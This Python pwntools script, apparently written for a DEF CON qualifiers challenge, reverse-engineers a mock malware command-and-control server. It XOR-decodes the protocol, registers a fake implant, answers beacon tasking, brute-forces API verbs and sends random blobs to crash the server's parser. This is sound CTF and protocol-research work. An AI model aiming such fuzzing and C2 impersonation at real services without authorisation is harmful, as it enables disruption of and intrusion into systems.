import os
import random
import string  # used by gen_ascii_strs; do not rely on pwn's star-import for it
import time
from itertools import product

from pwn import *
# Error messages observed from the server (after decoding):
#   ERROR Client not registered.
#   ERROR Invalid API command.          # unknown verb, or message longer than 1000 bytes
#   ERROR Incorrect Format, should be %s %[^\r\n\r\n]s\r\n\r\n
#   ERROR Improper registration sequence.
# The "Incorrect Format" text echoes what looks like a C scanf-style format
# ("%s %[^...]s"); it hints at how the server splits each line, but treat it
# as a lead for the fuzzer, not a confirmed finding.
# Usage: python3 mal_fuzz.py SILENT=1   (SILENT=1 is a pwntools command-line
# arg that quiets its own logging so only this script's output is shown)
# TCP port of the target service at research.threatsims.com (the host name is
# repeated in every connecting function below).
port: int = 13097
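def enc(str_data):
    """XOR *str_data* with the repeating protocol key and return the result.

    The wire obfuscation is a per-character XOR against the fixed 16-character
    key ``DEFCON_QUALS_RTV`` cycled over the message, so the operation is its
    own inverse: ``enc(enc(s)) == s`` and the same function decodes replies.
    This is obfuscation, not encryption -- anyone holding the key (or a few
    bytes of known plaintext) recovers the traffic.

    Args:
        str_data: text to (de)obfuscate; an empty string yields ``""``.

    Returns:
        A ``str`` of the same length whose code points are the XOR of each
        input code point with the corresponding key character.  It works on
        code points, not bytes: feed latin-1-decoded text when a byte-exact
        result is required.
    """
    key = "DEFCON_QUALS_RTV"
    klen = len(key)
    # One join instead of repeated ``+=``: linear rather than quadratic.
    return "".join(
        chr(ord(ch) ^ ord(key[i % klen])) for i, ch in enumerate(str_data)
    )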
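def send_cmd(api_cmd):
    """Probe the service with one API verb and report whether it is recognised.

    Opens a fresh TCP connection, sends ``"<api_cmd> AAAAA"`` obfuscated with
    :func:`enc` and terminated by ``\\r\\n\\r\\n``, then decodes the reply.
    Any non-empty reply other than the ``Invalid API command`` error is
    printed as a candidate verb.

    Args:
        api_cmd: the verb to test (e.g. ``"REG"``); sent verbatim.

    Note:
        Errors from :func:`remote` (refused connection, DNS) propagate so a
        driver loop can record where it stopped; errors after the connection
        is up (EOF, short or undecodable reply) are printed, not swallowed.
        ``recv()`` uses pwntools' default timeout, which as far as I can tell
        is effectively unbounded -- a silent server will hang this call.
    """
    delim = "\r\n\r\n"
    r = remote("research.threatsims.com", port)
    try:
        r.send(enc("%s AAAAA" % api_cmd) + delim)
        data = r.recv()
        # latin-1 maps every byte to one code point, so the XOR'd payload
        # always decodes; utf-8 would raise on any byte >= 0x80.
        text = data.decode("latin-1")
        if text.endswith(delim):
            text = text[: -len(delim)]
        dec_data = enc(text)
        # An empty reply proves nothing, so it must not be reported as valid.
        if dec_data and "Invalid API command" not in dec_data:
            print("VALID COMMAND: %s" % api_cmd)
    except Exception as exc:
        print("send_cmd(%r): no usable reply (%s)" % (api_cmd, exc))
    finally:
        r.close()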
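def reg_malware(mal_id, mal_fam):
    """Register a fake implant: ``REG <mal_id>`` then ``FAMILY <mal_fam>`` on one connection.

    Both messages are obfuscated with :func:`enc` and terminated by
    ``\\r\\n\\r\\n``.  The decoded reply to ``REG`` is printed.  The reply to
    ``FAMILY`` is deliberately *not* read: the server may not send one, and
    ``recv()`` would then block for pwntools' default (effectively unbounded)
    timeout -- so acceptance of the family name is not confirmed here.

    Args:
        mal_id: identifier the server will associate with this client.
        mal_fam: family name.  ``bytes`` (``fuzz_id`` passes ``os.urandom``
            output) are sent byte-for-byte via latin-1; with ``%s`` alone
            they would go out as their Python ``b'...'`` repr instead.
    """
    delim = "\r\n\r\n"
    if isinstance(mal_fam, bytes):
        # latin-1 is a 1:1 byte<->code point map, and pwntools' default
        # 'auto' encoding tries latin-1 first on send, so the raw bytes
        # survive the XOR unchanged (verify if context.encoding is altered).
        mal_fam = mal_fam.decode("latin-1")
    r = remote("research.threatsims.com", port)
    try:
        r.send(enc("REG %s" % mal_id) + delim)
        reply = r.recv()
        # latin-1 always decodes; utf-8 would raise on XOR'd bytes >= 0x80
        # and the error used to be swallowed by a bare except.
        text = reply.decode("latin-1")
        if text.endswith(delim):
            text = text[: -len(delim)]
        print(enc(text))
        r.send(enc("FAMILY %s" % mal_fam) + delim)
    except Exception as exc:
        print("reg_malware(%r): registration failed (%s)" % (mal_id, exc))
    finally:
        r.close()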
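def beacon(mal_id, data):
    """Check in as *mal_id* and answer tasking until the server stops or sends an unknown task.

    Sends ``PING <mal_id>``, then loops: each reply is decoded with
    :func:`enc`, its second space-separated token is taken as the task verb,
    and for ``id``/``uname`` the raw reply bytes are echoed back in a
    ``DATA`` message, while ``uptime`` echoes everything accumulated so far.
    Any other verb, a reply without a second token, or a closed connection
    ends the loop; the socket is always closed.

    Args:
        mal_id: identifier previously registered with :func:`reg_malware`.
        data: unused -- the body never reads it (it was shadowed by the
            ``recv()`` result in the original); kept for call compatibility
            with ``fuzz_beacon``.

    Fixes relative to the original: ``resp`` is initialised before the loop
    (``resp += data`` on the first ``uptime`` raised UnboundLocalError), a
    reply with no space no longer raises IndexError, and echoed bytes go out
    as raw bytes via latin-1 rather than as their Python ``b'...'`` repr.
    """
    delim = "\r\n\r\n"
    r = remote("research.threatsims.com", port)
    resp = b""
    try:
        r.send(enc("PING %s" % mal_id) + delim)
        while True:
            try:
                raw = r.recv()
            except Exception:
                break  # EOF / connection dropped: done beaconing
            text = raw.decode("latin-1")
            if text.endswith(delim):
                text = text[: -len(delim)]
            dec_data = enc(text)
            print(dec_data)
            fields = dec_data.split(" ")
            if len(fields) < 2:
                break
            cmd = fields[1]
            if cmd in ("id", "uname"):
                resp = raw
            elif cmd == "uptime":
                resp += raw
            else:
                break
            # latin-1 keeps every byte, so the server's own reply bytes are
            # echoed unchanged (the original sent the repr of the bytes).
            r.send(enc("DATA %s" % resp.decode("latin-1")) + delim)
    finally:
        r.close()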
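def fuzz_initial():
    """Send a random-length blob of random bytes as the very first message and print the decoded reply.

    Exercises the server's pre-registration parser: 0-50000 bytes from
    ``os.urandom`` followed by ``\\r\\n\\r\\n``.  The reply is decoded with
    :func:`enc` and printed; if the server drops the connection or sends
    nothing usable, that is printed (with the blob length) instead of being
    swallowed, since a crash on a particular length is exactly what a fuzzer
    is looking for.  ``random`` is fine for the length here -- it is a fuzz
    parameter, not a secret.
    """
    delim = "\r\n\r\n"
    num = random.randint(0, 50000)
    payload = os.urandom(num) + delim.encode("utf-8")
    r = remote("research.threatsims.com", port)
    try:
        r.send(payload)
        reply = r.recv()
        # latin-1 always decodes; utf-8 could raise on XOR'd bytes >= 0x80.
        text = reply.decode("latin-1")
        if text.endswith(delim):
            text = text[: -len(delim)]
        print(enc(text))
    except Exception as exc:
        print("fuzz_initial: %d random bytes, no usable reply (%s)" % (num, exc))
    finally:
        r.close()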
def fuzz_id():
    """Fuzz the FAMILY field: register the fixed implant id with a random byte blob as its family.

    The blob is 0-50000 bytes of ``os.urandom`` output; see
    :func:`reg_malware` for how ``bytes`` are put on the wire.
    """
    blob_len = random.randint(0, 50000)
    family_blob = os.urandom(blob_len)
    reg_malware("t2sI2azxacFrbx64tr5", family_blob)
def fuzz_beacon():
    """Register a fresh implant id under ``TheCovidBotNet`` and enter beacon mode.

    The id is the decimal string of a random length 0-50000; a blob of that
    many random bytes is passed to :func:`beacon`, which currently ignores it.
    """
    size = random.randint(0, 50000)
    blob = os.urandom(size)
    ident = str(size)
    reg_malware(ident, "TheCovidBotNet")
    beacon(ident, blob)
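def product_loop(generator, ret_list):
    """Append the joined string of every tuple in *generator* to *ret_list*, in place.

    Args:
        generator: iterable of sequences of single-character strings, e.g.
            ``itertools.product(string.ascii_uppercase, repeat=3)``.
        ret_list: list to extend; mutated in place.

    Returns:
        ``None`` -- results accumulate in *ret_list* (stdlib convention for
        in-place mutators).
    """
    ret_list.extend("".join(chars) for chars in generator)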
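def gen_ascii_strs(max_len, min_len=3):
    """Return every uppercase-ASCII string of length ``min_len`` .. ``max_len - 1``.

    Candidates are produced shortest-first and alphabetically within a
    length, so a fuzz run can be resumed from the last value printed.

    Args:
        max_len: exclusive upper bound on the string length (as in the
            original ``range(3, max_len)``).
        min_len: inclusive lower bound; defaults to 3, the original's value.

    Returns:
        A fully materialised list.  There are ``26**L`` entries per length, so
        ``gen_ascii_strs(6)`` holds about 12.4 million strings and several
        hundred MB of memory.
    """
    alphabet = string.ascii_uppercase
    words = []
    for length in range(min_len, max_len):
        words.extend("".join(t) for t in product(alphabet, repeat=length))
    return words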
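def fuzz_API(prev_stop=None):
    """Brute-force 3- to 5-letter uppercase API verbs against the server, one connection each.

    Args:
        prev_stop: the ``Last Value`` printed by an earlier run.  When given,
            candidates before it are skipped and fuzzing resumes *at* that
            value (inclusive).  If it is not a generated candidate, nothing
            is sent and a message says so -- the original silently walked the
            whole list without sending anything.

    On any error from :func:`send_cmd` (typically a refused connection) or on
    Ctrl-C, the current candidate is printed as ``Last Value`` so the run can
    be resumed, then the loop stops.  ``KeyboardInterrupt`` is caught on
    purpose: the resume point must still be printed when the operator stops
    the run by hand.
    """
    candidates = gen_ascii_strs(6)
    if prev_stop is not None:
        try:
            start = candidates.index(prev_stop)
        except ValueError:
            print("prev_stop %r is not a generated candidate; nothing to do" % prev_stop)
            return
        # Drop in place rather than slicing: the list is ~12M entries.
        del candidates[:start]
    for val in candidates:
        try:
            send_cmd(val)
        except (Exception, KeyboardInterrupt):
            print("Last Value: %s" % val)
            break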
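# Usual (non-fuzzing) operation: register an implant, then enter beacon mode.
#   mal_id = "t2sI2azxacFrbx64tr5"
#   mal_fam = "TheCovidBotNet"
#   reg_malware(mal_id, mal_fam)
#   beacon(mal_id, b"")
# Observed: the server also accepts GET as a verb.
# Fuzzing modes -- uncomment one; each opens a new connection per message:
#   while True:
#       fuzz_initial()
#       fuzz_id()
#       fuzz_beacon()

if __name__ == "__main__":
    # Resume the API-verb brute force at "SOJ" (the Last Value of the previous
    # run); pass None to start from "AAA".  The guard keeps an import of this
    # module (e.g. for testing) from opening connections.
    fuzz_API("SOJ")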